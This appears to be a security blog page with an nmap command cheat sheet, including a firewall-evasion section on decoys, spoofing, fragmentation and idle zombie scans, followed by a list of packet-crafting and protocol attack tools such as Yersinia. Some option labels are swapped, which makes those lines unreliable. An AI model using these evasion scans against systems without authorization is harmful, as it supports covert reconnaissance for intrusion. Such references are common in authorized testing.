Scan all ports —-> nmap -p “*” [target]
Scan top ports —–> nmap –top-ports [number] [target]
Perform a sequential port scan —-> nmap -r [target]

Version Detection
Operating system detection —-> nmap -O [target]
Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/
Attempt to guess an unknown —-> nmap -O –osscan-guess [target]
Service version detection —-> nmap -sV [target]
Troubleshooting version scans —-> nmap -sV –version-trace [target]
Perform a RPC scan —-> nmap -sR [target]

Timing Options
Timing Templates —-> nmap -T [0-5] [target]
Set the packet TTL —-> nmap –ttl [time] [target]
Minimum of parallel connections —-> nmap –min-parallelism [number] [target]
Maximum of parallel connection —-> nmap –max-parallelism [number] [target]
Minimum host group size —–> nmap –min-hostgroup [number] [targets]
Maximum host group size —-> nmap –max-hostgroup [number] [targets]
Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]
Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]
Maximum retries —-> nmap –max-retries [number] [target]
Host timeout —-> nmap –host-timeout [time] [target]
Minimum Scan delay —-> nmap –scan-delay [time] [target]
Maximum scan delay —-> nmap –max-scan-delay [time] [target]
Minimum packet rate —-> nmap –min-rate [number] [target]
Maximum packet rate —-> nmap –max-rate [number] [target]
Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques
Fragment packets —-> nmap -f [target]
Specify a specific MTU —-> nmap –mtu [MTU] [target]
Use a decoy —-> nmap -D RND: [number] [target]
Idle zombie scan —> nmap -sI [zombie] [target]
Manually specify a source port —-> nmap –source-port [port] [target]
Append random data —-> nmap –data-length [size] [target]
Randomize target scan order —-> nmap –randomize-hosts [target]
Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]
Send bad checksums —-> nmap –badsum [target]

Output Options
Save output to a text file —-> nmap -oN [scan.txt] [target]
Save output to a xml file —> nmap -oX [scan.xml] [target]
Grepable output —-> nmap -oG [scan.txt] [target]
Output all supported file types —-> nmap -oA [path/filename] [target]
Periodically display statistics —-> nmap –stats-every [time] [target]
133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging
Help —> nmap -h
Display Nmap version —-> nmap -V
Verbose output —-> nmap -v [target]
Debugging —-> nmap -d [target]
Display port state reason —-> nmap –reason [target]
Only display open ports —-> nmap –open [target]
Trace packets —> nmap –packet-trace [target]
Display host networking —> nmap –iflist
Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine
Execute individual scripts —> nmap –script [script.nse] [target]
Execute multiple scripts —-> nmap –script [expression] [target]
Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln
Execute scripts by category —-> nmap –script [category] [target]
Execute multiple scripts categories —-> nmap –script [category1,category2, etc]
Troubleshoot scripts —-> nmap –script [script] –script-trace [target]
Update the script database —-> nmap –script-updatedb

Ndiff
Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]
XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]
Thank you (zer0w0rm)
Posted by Zer0w0rm at 8:48 PM 0 comments

 

Top 5 Packet Crafting Tools

The top 5 packet crafting tools on the recommendation list:



No 1:

1Hping2 : A network probing utility like ping on steroids

This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities. This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols.

No2:

Scapy : Interactive packet manipulation tool

Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make.

No3:

Nemesis : Packet injection simplified

The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts. If you enjoy Nemesis, you might also want to look at Hping2 as they complement each other well.

No4:

2 Yersinia : A multi-protocol low-level attack tool

Yersinia is a low-level protocol attack tool useful for penetration testing. It is capable of many diverse attacks over multiple protocols, such as becoming the root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP (Cisco Discovery Protocol) neighbors, becoming the active router in a HSRP (Hot Standby Router Protocol) scenario, faking DHCP replies, and other low-level attacks.

No5:

Colasoft Packet Builder enables creating custom network packets; users can use this tool to check their network protection against attacks and intruders.Colasoft Packet Builder includes a very powerful editing feature. Besides common HEX editing raw data, it features a Decoding Editor allowing users to edit specific protocol field values much easier.

Thank you (zer0w0rm)
Posted by Zer0w0rm at 2:17 AM 0 comments

 
Subscribe to: Posts (Atom)